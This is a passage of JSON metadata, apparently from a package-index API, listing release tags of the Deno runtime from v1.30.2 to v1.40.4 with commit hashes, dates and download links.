8","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.